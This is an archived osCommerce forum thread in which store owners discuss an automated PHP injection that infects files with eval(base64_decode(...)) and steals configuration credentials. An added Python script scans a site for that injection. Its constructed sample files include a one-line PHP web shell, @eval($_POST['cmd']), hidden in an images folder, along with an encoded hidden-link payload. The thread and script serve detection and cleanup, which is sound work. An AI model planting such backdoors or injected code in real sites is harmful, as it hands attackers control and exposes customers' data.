Guest, Posted October 19, 2009

Hi All. While doing some work on my PHP files I have noticed some code at the top that was not there before; it starts with this: /**/eval(base64_decode( ... Not sure what it is, but I do know my file permissions are right and don't suspect a hack. I have not pasted all the encrypted code. Anyone have any suggestions? Many thanks, Liam
JR Sales Company, Posted October 19, 2009

You have been hit by an automated hack that has been affecting open source applications. View your source code on any .php file, and you will see URLs implanted at the top of your pages, probably advertising a site called forex.com, ferdax.com, etc.

The hacker exploits admin vulnerabilities by bypassing your login and using admin/file_manager.php to edit and infect *all* of your .php files, and upload his own, including his back door entry. They will also steal your admin password info, and database/FTP passwords on the way out by looking in your configure.php files.

Check your files folders and look for files that shouldn't be there, like strange .php files in the images folders, etc. If you have your website and database backed up, I would recommend deleting all server files and your database, and re-uploading them from your backups. That will solve the current compromise. Other solutions are available in the threads below.

It is caused by vulnerabilities in admin/file_manager.php, admin/define_languages.php, and from not having proper .htaccess protection in the admin directory. Read the threads below on how to secure your site.

See threads:
http://www.oscommerce.com/forums/topic/344272-did-someone-hack-my-site-eval-base64-decode/page__hl__hacked
http://www.oscommerce.com/forums/index.php?showtopic=313323

You're not alone, a bunch of us got hit.
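Added example, not from the original thread and not osCommerce code: a Python triage script that does the two checks described in the post above, statically and without ever executing the injected PHP. It walks a webroot for .php files, flags any that carry the eval(base64_decode('...')) wrapper, decodes the base64 payload (peeling nested wrappers) to pull out the planted URLs, and lists .php files sitting in image directories. The sample webroot, file names, the example-forex.invalid URL and the payload are constructed here for the demonstration; they are not the real 2009 injection.

```python
import base64
import re
import shutil
import tempfile
from pathlib import Path

# Constructed sample payload for the demo (not the real 2009 injection):
# a hidden link block, wrapped once and twice in eval(base64_decode(...)).
PLANTED_HTML = '<div style="display:none"><a href="http://example-forex.invalid/">forex</a></div>'
PAYLOAD = base64.b64encode(("echo '%s';" % PLANTED_HTML).encode()).decode()
NESTED = base64.b64encode(("eval(base64_decode('%s'));" % PAYLOAD).encode()).decode()

# Constructed sample webroot: one clean file, two infected files, one dropped backdoor.
SAMPLE_FILES = {
    "index.php": "<?php /**/eval(base64_decode('%s'));?>\n<?php\nrequire('includes/application_top.php');\n" % PAYLOAD,
    "includes/functions/general.php": "<?php /**/eval(base64_decode('%s'));?>\n<?php\nfunction tep_example() {}\n" % NESTED,
    "includes/configure.php": "<?php\ndefine('DB_SERVER', 'localhost');\n",
    "images/logo.php": "<?php\n@eval($_POST['cmd']);\n",
}

INJECT_RE = re.compile(r"eval\s*\(\s*base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)\s*\)")
URL_RE = re.compile(r"https?://[^\s'\"<>]+")
IMAGE_DIRS = {"images", "img", "image"}  # assumed names for the store's image folders


def decode_payload(b64, max_depth=5):
    """Decode a base64 payload statically, unwrapping nested eval(base64_decode()) layers.

    Nothing is executed; the text is only inspected. Stops on invalid base64 or
    after max_depth wrappers so hostile input cannot make it loop forever.
    """
    current, text = b64, ""
    for _ in range(max_depth):
        try:
            text = base64.b64decode(current, validate=True).decode("utf-8", "replace")
        except ValueError:  # binascii.Error is a ValueError
            break
        inner = INJECT_RE.search(text)
        if not inner:
            break
        current = inner.group(1)
    return text


def scan_tree(root):
    """Return findings for every .php file under root: injected wrappers and PHP in image dirs."""
    root = Path(root)
    findings = []
    for path in root.rglob("*.php"):
        rel = path.relative_to(root)
        content = path.read_text(encoding="utf-8", errors="replace")
        m = INJECT_RE.search(content)
        if m:
            payload = decode_payload(m.group(1))
            findings.append({"file": rel.as_posix(), "type": "injected_eval",
                             "urls": URL_RE.findall(payload)})
        # A .php file inside an images folder has no business being there.
        if any(part.lower() in IMAGE_DIRS for part in rel.parts[:-1]):
            findings.append({"file": rel.as_posix(), "type": "php_in_image_dir", "urls": []})
    return sorted(findings, key=lambda f: (f["file"], f["type"]))


def build_sample_tree():
    """Write the constructed sample files into a temporary directory and return its path."""
    root = Path(tempfile.mkdtemp(prefix="osc_scan_"))
    for rel, content in SAMPLE_FILES.items():
        target = root / rel
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_text(content, encoding="utf-8")
    return root


def run_demo():
    """Scan the constructed sample tree and clean it up afterwards."""
    root = build_sample_tree()
    try:
        return scan_tree(root)
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    for f in run_demo():
        print("%-18s %-32s %s" % (f["type"], f["file"], " ".join(f["urls"])))
```

On a real store you would call scan_tree() on the catalog root instead of the sample tree. It is a triage aid only: it tells you which files were touched and where the planted links point, it does not clean anything, and it will not find a backdoor that avoids the eval(base64_decode pattern, so the advice in the thread to restore from a pre-compromise backup and change every credential still applies.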
Xpajun, Posted October 19, 2009

"..... They will also steal your admin password info, and database/ftp passwords on the way out by looking in your configure.php files. ....."

Are you sure this is not a tiny bit over dramatic? Admin passwords (as are your customer passwords) are encrypted; access to the database is controlled by .htaccess by your host (at least in my case). Although what you say may be possible, the reason for this injected hack is to send your new customer email details to various spammers.

My store is currently running Phoenix 1.0.3.0. I'm currently working on 1.0.7.2 and hope to get it live before 1.0.8.0 arrives (maybe 🙄). I used to have a list of add-ons here, but I've found that with the ones that supporters of Phoenix get, any other add-ons are not really necessary.
JR Sales Company, Posted October 19, 2009

"Are you sure this is not a tiny bit over dramatic? Admin passwords (as are your customer passwords) are encrypted, access to the database is controlled by .htaccess by your host (at least in my case) Although what you say may be possible the reason for this injected hack is to send your new customer email details to various spammers"

I don't feel that sharing a fact is dramatic. Configure.php lists the database host server, id, and password. The id and password are the db login, at least in GoDaddy's case. You can, with that info, go directly to the db server, and log in to the SQL server. The admin and customer accounts are stored in the database, and wouldn't be very hard to extract for someone who knows what they are doing, encrypted or not.

I mean no alarm, I only report on what has happened in my case. Server log shows:
1. The exploit of file_manager.php.
2. Configure.php downloaded.
3. GoDaddy reports MySQL Admin CP logged into right after.

And they got around the .htaccess login for the admin folder, spyware or something. With all that action, I believe there may have been a live person working along. Not trying to tell anyone to panic. Just things that may have happened. :D

If I wanted to incite drama and panic, I would simply say "OH...MY....GOD!!!!!! YOUR WEBSITE WAS HACKED!!!! OMG OMG OMG OMGOMGOMGOMGOMGOMGOMGOMOMG!!!!!!!!" :)
spooks, Posted October 19, 2009

"Are you sure this is not a tiny bit over dramatic?"

Jason is perfectly correct. I suggest you read the topics on this very nasty hack; once 'in', the hacker has full control over your site, and the uploaded tool even gives him direct access to the database!! You should never be complacent about security; it's a pity it's taken something like this to wake some up to that fact.

Sam
Remember, what you think I meant may not be what I thought I meant when I said it.
Contributions: Auto Backup your Database, Easy way; Multi Images with Fancy Pop-ups, Easy way; Products in columns with multi buy etc etc; Disable any Category or Product, Easy way; Secure & Improve your account pages et al.
FIMBLE, Posted October 19, 2009

This is one of the worst I have seen. Anyone who still a) has the filemanager.php in the admin folder, or b) has the admin folder still named "admin", is open to this. It's not a case of if, it's when, and it will be bad.

If you have been subject to the attack, the sure way of getting rid of it is to delete the whole site, not just osC but forums etc. as well; any PHP file will be infected. Delete the databases and restore the whole lot from a point in time before the hack took place. Obviously you are going to need to change your logins too, and check that no additional accounts in your SQL have been created. It may be a step too far, but I have deleted accounts from servers and recreated them to ensure all has gone.

The problem is, with a lot of users, they do not know until it's already too late and have no idea about security: if it's password protected then it's safe ... not so.

Nic
Sometimes you're the dog and sometimes the lamp post
My Contributions
Guest, Posted October 19, 2009

Thanks to everyone that has replied. I thought as much. I will follow the advice from the links provided and will now have to delete the site and start again, as my server backups are only kept for three days. Oh well, I will at least have something to do over the next two days.

Regards, Liam
This topic is now archived and is closed to further replies.